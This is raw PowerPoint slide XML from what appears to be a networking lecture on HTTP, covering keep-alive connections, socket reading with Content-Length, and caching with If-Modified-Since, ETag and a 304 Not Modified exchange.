      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiplex multiple transfers onto one TCP socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection header takes two values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connection: close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 0.9/1.0 behavior, please close the socket after this request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>New behavior, keep the socket open after this request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server may or may not comply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server may respond to Connection: keep-alive with Connection: close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If client does not specify, server may decide to respond with Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Not safe for clients to assume that servers will always close connections!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> response header is needed when Connection: keep-alive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20740919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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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1.1 Socket Semantics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="521862" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open TCP socket, connect to remote host (typically on port 80 or 443)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="521862" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write the HTTP request to the socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include Host and Connection headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="521862" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read from the socket until \r\n\r\n is found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826878" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Indicates response header has been read completely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="521862" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If Connection: closed (HTTP 0.9/1.0 behavior)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826878" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read response data from socket until it is closed by the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="521862" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If Connection: keep-alive (HTTP 1.1 behavior)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826878" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locate Content-Length response header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826878" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bytes from socket, where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is content length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="521862" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Either open a new socket for the next request, or reuse the existing socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826878" lvl="1" indent="-514350"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04ED445A-A2BC-4CB6-C98D-C533CC664DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9139213" y="3499615"/>
            <a:ext cx="2719262" cy="180965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Beware: some of the response body may already have been read, so amount remaining to be read may be less than Content-Length</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90E48EB3-C1C6-1A3E-E43E-997C8D9EF24E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7329562" y="3274605"/>
            <a:ext cx="1689965" cy="679816"/>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8F30DB4-94E5-DD61-F3A6-6BACC9365EC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7846605" y="5036381"/>
            <a:ext cx="1172922" cy="76599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4081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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67"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Caching</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clients (and HTTP proxies) often cache documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenge: update of documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>If-Modified-Since</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> requests to check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 0.9/1.0 used just date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 1.1 has an opaque “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” (could hash of the document, etc.) as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>If-Modified-Since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>not always sufficient?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. no two copies of the Facebook “homepage” are the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When/how often should the original be checked for changes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Expires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Expires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, often use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Last-Modified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as estimate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311355080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Cache Check</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385666" y="1343458"/>
            <a:ext cx="5611909" cy="823912"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385666" y="2178626"/>
            <a:ext cx="5611910" cy="4574021"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>GET / HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Accept: */*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>-us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, deflate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>If-Modified-Since: Mon, 29 Jan 2001 	17:54:18 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>If-None-Match: "7a11f-10ed-3a75ae4a"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>User-Agent: Mozilla/4.0 (compatible)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Host: www.intel-iris.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Connection: Keep-Alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1343458"/>
            <a:ext cx="5578150" cy="823912"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172199" y="2178626"/>
            <a:ext cx="5578151" cy="4574021"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro Semibold"/>
                <a:ea typeface="Source Code Pro Semibold"/>
                <a:cs typeface="Source Code Pro Semibold"/>
                <a:sym typeface="Source Code Pro Semibold"/>
              </a:rPr>
              <a:t>HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>304 Not Modified</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro Semibold"/>
              <a:ea typeface="Source Code Pro Semibold"/>
              <a:cs typeface="Source Code Pro Semibold"/>
              <a:sym typeface="Source Code Pro Semibold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro Semibold"/>
                <a:ea typeface="Source Code Pro Semibold"/>
                <a:cs typeface="Source Code Pro Semibold"/>
                <a:sym typeface="Source Code Pro Semibold"/>
              </a:rPr>
              <a:t>Date: Tue, 27 Mar 2001 03:50:51 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro Semibold"/>
                <a:ea typeface="Source Code Pro Semibold"/>
                <a:cs typeface="Source Code Pro Semibold"/>
                <a:sym typeface="Source Code Pro Semibold"/>
              </a:rPr>
              <a:t>Server: Apache/1.3.14 (Unix) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro Semibold"/>
                <a:ea typeface="Source Code Pro Semibold"/>
                <a:cs typeface="Source Code Pro Semibold"/>
                <a:sym typeface="Source Code Pro Semibold"/>
              </a:rPr>
              <a:t>Connection: Keep-Alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro Semibold"/>
                <a:ea typeface="Source Code Pro Semibold"/>
                <a:cs typeface="Source Code Pro Semibold"/>
                <a:sym typeface="Source Code Pro Semibold"/>
              </a:rPr>
              <a:t>Keep-Alive: timeout=15, max=100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro Semibold"/>
                <a:ea typeface="Source Code Pro Semibold"/>
                <a:cs typeface="Source Code Pro Semibold"/>
                <a:sym typeface="Source Code Pro Semibold"/>
              </a:rPr>
              <a:t>ETag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro Semibold"/>
                <a:ea typeface="Source Code Pro Semibold"/>
                <a:cs typeface="Source Code Pro Semibold"/>
                <a:sym typeface="Source Code Pro Semibold"/>
              </a:rPr>
              <a:t>: "7a11f-10ed-3a75ae4a”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121637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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:bg/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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0"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Hypertext Transfer Protocol (HTTP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="2743200"/>
            <a:ext cx="9497484" cy="2672522"/>
          </a:xfrm>
